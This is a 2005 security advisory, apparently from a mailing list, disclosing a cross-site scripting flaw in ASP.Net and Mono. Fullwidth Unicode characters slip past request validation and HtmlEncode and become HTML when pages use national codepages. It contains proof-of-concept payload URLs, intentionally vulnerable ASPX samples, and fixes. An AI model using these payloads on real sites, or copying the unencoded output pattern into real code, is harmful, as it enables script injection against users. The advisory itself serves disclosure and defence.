XSS vulnerabilty in ASP.Net [with details]

[Andir Andir <spam_andir () mail ru>]

In August 2004 I found XSS vulnerability in Microsoft ASP.Net, and now I publish
it.

Full details:
En: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml
Ru: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.ru.xml

P.S. I to present my appologies for bad english :( My native language is
Russian.

With best regards, Andir!

> From David Ahmad <da () securityfocus com>: 
> Please include the full details in your message. Thank you!

Details from http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml:

---------------------------------------------------------------------------------
XSS vulnerability in ASP.Net

Andrey Rusyaev, post-graduate student, Security Chair, FESU (Far Eastern State University), Vladivostok, Russia, 
andir[SPAM-PROTECT]@it-project.ru.

February 9, 2005, updated February 14, 2005

Abstract

In specific conditions the cross-site scripting attack (XSS) [1] are possible on web site under management ASP.Net, 
because used a wrong filtration of special HTML characters. Attack exploits vulnerability of mechanism of converting 
Unicode strings [2] to national ASCII codepages. The basic problem arises from the lack of a filtration of special HTML 
characters in range U+ff00-U+ff60 (fullwidth ASCII characters [3]).

Introduction

The problem has been discovered in August 2004. Affected all versions of .Net Framework what exist at present day:

    * .Net Framework, version 1.0
    * .Net Framework, version 1.0 + service pack 1
    * .Net Framework, version 1.0 + service pack 2
    * .Net Framework, version 1.1
    * .Net Framework, version 1.1 + service pack 1
    * .Net Framework, version 1.1 + service pack 1 + Security Bulletin MS05-004 from February 8, 2005

After some testing, similar problem has been discovered in free implementation of .Net Framework by Mono Project [4]. 
Affected following versions:

    * Mono, version 1.0.5.

Note: Another versions has not been tested.

Background

.Net Framework manipulates strings in Unicode only. Converting from/to national codepages ASCII is possible for 
input/output respectively. In particular, HTML text may be outputted on Web page in national ASCII codepage (such as 
'windows-1251', 'koi-8', and more) with using ASP.Net. In this conditions Unicode characters from range U+ff00-U+ff60 
(fullwidth ASCII characters) would be converted to normal ASCII characters respectively. Among fullwidth ASCII 
characters present some special HTML characters (such as '<', '>', and others), which may be used for injecting 
malicious HTML code or malicious script code (with <script> HTML tag) or other variants (more details in [5]).

Vulnerability Details

Has been discovered that mechanism of ASP.Net has no filtration of special HTML characters (such as '>', '<' and 
others) in Unicode strings for output web page in one from national ASCII codepages.

   1. Injection of special HTML characters to ASP.Net web-page with using Unicode characters from fullwidth ASCII 
characters range.

      Example:

      http://server.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

      Web page 'attack1.aspx' prints HTTP request parameter 'test'.
      Web page like following:

     <!-- Web page attack1.aspx -->
     <% @Page Language="cs" %>
     <%
        Response.Write(Request.QueryString["test"]); // Attack through URL parameter
     %>                                         

     Web.config for server.com like following:

     <configuration>
       <system.web>
         <globalization responseEncoding="windows-1251" />
       </system.web>
     </configuration>           

  2. ASP.NET Request Validation Bypass Vulnerability.

      The "Request Validation" mechanism designed to protect against Cross-Site Scripting and SQL injection allows 
restricted tags in Unicode range of fullwidth ASCII characters U+ff00-U+ff60.

     Example:
     http://server.com/attack2.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

     Web page 'attack2.aspx' prints HTTP request parameter 'test'.
     Web page like following:

     <!-- Web page attack2.aspx -->
     <% @Page Language="cs" validateRequest="true" %>
     <%
        Response.Write(Request.QueryString["test"]); // Attack through URL parameter
     %>                                 

     Web.config for server.com like following:

     <configuration>
       <system.web>
         <globalization responseEncoding="windows-1251" />
       </system.web>
     </configuration>           

     Note: attribute of ASP.Net Web page - validateRequest allowed only for ASP.Net of version 1.1 and more, or for 
Mono (no any information about versions) [6].
  
  3. HTML Encoding methods bypass
      Note: This attack does not applied to ASP.Net in Mono implementation.

      HttpServerUtility.HtmlEncode has no filtration mechanism for Unicode characters from range U+ff00-U+ff60.

      The methods for encoding special HTML characters does not protect from attacks in previous examples. Encoding 
process used before converting to national ASCII codepage for output, and attacker may use fullwidth ASCII characters 
for injecting malicious code on Web page.

      Example: 
http://server.com/attack3.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

      Web page 'attack3.aspx' prints:
         1. HTTP request parameter 'test',
         2. Some string with injected Unicode characters.

      Web page like following:

     <!-- Web page attack3.aspx -->
     <% @Page Language="cs" %>
     <%
        Response.Write(Server.HtmlEncode(Request.QueryString["test"])); // 1) Attack through URL parameter
        string code = Server.HtmlEncode("\xff1cscript\xff1ealert('vulnerability')\xff1c/script\xff1e"); // 2) Attack 
through injected Unicode characters 
        Response.Write(code);
     %>

     Web.config for server.com like following:

     <configuration>
       <system.web>
         <globalization responseEncoding="windows-1251" />
       </system.web>
     </configuration>

Protection Methods

Some variants of protection methods may be proposed:

    * Use only Unicode codepage for output on ASP.Net pages, for this purpose add web.config like following:

    <configuration>
      <system.web>
        <globalization responseEncoding="utf-8" />
     </system.web>
    </configuration>
                                                

    * If you cannot use Unicode, you must to filter fullwidth ASCII characters from any untrusted data sources (user 
input, HTTP headers, some components ouput and other data). 

More Information

About this vulnerability has been reported to Microsoft Security Response Center at August 2, 2004 and received answer 
that opened case 5438 for description of vulnerability. Later, I received following answer:

"We have decided that a KB article and update to tools and/or best practice guidelines should be done for this, and 
will be as time permits. We are not tracking this case as a security bulletin".

Vulnerability has no patch at current moment (February 9, 2005).
References

   1. CERT  Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests, 
http://www.cert.org/advisories/CA-2000-02.html
   2. Unicode Home Page, http://unicode.org/.
   3. Unicode.org, Halfwidth and Fullwidth Forms, http://www.unicode.org/charts/PDF/UFF00.pdf.
   4. Mono Project, http://mono-project.com/.
   5. CGISecurity.com, "The Cross Site Scripting FAQ.", May 2002, http://www.cgisecurity.com/articles/xss-faq.shtml.
   6. .Net Framework SDK, @Page directive, ValidateRequest attribute, 
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpgenref/html/cpconPage.asp.